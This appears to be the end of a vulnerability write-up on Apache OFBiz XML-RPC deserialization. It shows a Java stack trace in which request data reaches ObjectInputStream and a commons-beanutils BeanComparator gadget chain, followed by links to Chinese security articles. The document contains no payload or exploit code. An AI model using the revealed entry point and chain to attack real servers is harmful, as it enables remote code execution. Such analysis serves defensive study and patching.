        java.lang.RuntimeException: InvocationTargetException: java.lang.reflect.InvocationTargetException
            at org.apache.commons.beanutils.BeanComparator.compare(BeanComparator.java:171) ~[commons-beanutils-1.9.3.jar:1.9.3]
            at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721) ~[?:1.8.0_141]
            at java.util.PriorityQueue.siftDown(PriorityQueue.java:687) ~[?:1.8.0_141]
            at java.util.PriorityQueue.heapify(PriorityQueue.java:736) ~[?:1.8.0_141]
            at java.util.PriorityQueue.readObject(PriorityQueue.java:795) ~[?:1.8.0_141]
            at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_141]
            at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[?:1.8.0_141]
            at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_141]
            at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_141]
            at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058) ~[?:1.8.0_141]
            at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2136) ~[?:1.8.0_141]
            at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2027) ~[?:1.8.0_141]
            at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1535) ~[?:1.8.0_141]
            at java.io.ObjectInputStream.readObject(ObjectInputStream.java:422) ~[?:1.8.0_141]
            at org.apache.xmlrpc.parser.SerializableParser.getResult(SerializableParser.java:36) ~[xmlrpc-common-3.1.3.jar:3.1.3]
            at org.apache.xmlrpc.parser.RecursiveTypeParserImpl.endValueTag(RecursiveTypeParserImpl.java:78) ~[xmlrpc-common-3.1.3.jar:3.1.3]
            at org.apache.xmlrpc.parser.MapParser.endElement(MapParser.java:185) ~[xmlrpc-common-3.1.3.jar:3.1.3]
            at org.apache.xmlrpc.parser.RecursiveTypeParserImpl.endElement(RecursiveTypeParserImpl.java:103) ~[xmlrpc-common-3.1.3.jar:3.1.3]
            at org.apache.xmlrpc.parser.XmlRpcRequestParser.endElement(XmlRpcRequestParser.java:165) ~[xmlrpc-common-3.1.3.jar:3.1.3]
            at org.apache.xerces.parsers.AbstractSAXParser.endElement(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.impl.XMLNSDocumentScannerImpl.scanEndElement(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl$FragmentContentDispatcher.dispatch(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.parsers.XMLParser.parse(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.xerces.jaxp.SAXParserImpl$JAXPSAXParser.parse(Unknown Source) ~[xercesImpl-2.9.1.jar:?]
            at org.apache.ofbiz.webapp.event.XmlRpcEventHandler.getRequest(XmlRpcEventHandler.java:285) ~[ofbiz.jar:?]
            at org.apache.ofbiz.webapp.event.XmlRpcEventHandler.execute(XmlRpcEventHandler.java:229) [ofbiz.jar:?]
            at org.apache.ofbiz.webapp.event.XmlRpcEventHandler.invoke(XmlRpcEventHandler.java:145) [ofbiz.jar:?]
            at org.apache.ofbiz.webapp.control.RequestHandler.runEvent(RequestHandler.java:741) [ofbiz.jar:?]
            at org.apache.ofbiz.webapp.control.RequestHandler.doRequest(RequestHandler.java:465) [ofbiz.jar:?]
            at org.apache.ofbiz.webapp.control.ControlServlet.doGet(ControlServlet.java:217) [ofbiz.jar:?]
            at org.apache.ofbiz.webapp.control.ControlServlet.doPost(ControlServlet.java:91) [ofbiz.jar:?]
    
    参考链接
    --------
    
    > https://xz.aliyun.com/t/8324\#toc-9
    >
    > https://blog.csdn.net/caiqiiqi/article/details/108646579
    >
    > https://xz.aliyun.com/t/8184/\#toc-4
    
    
    links
    file_download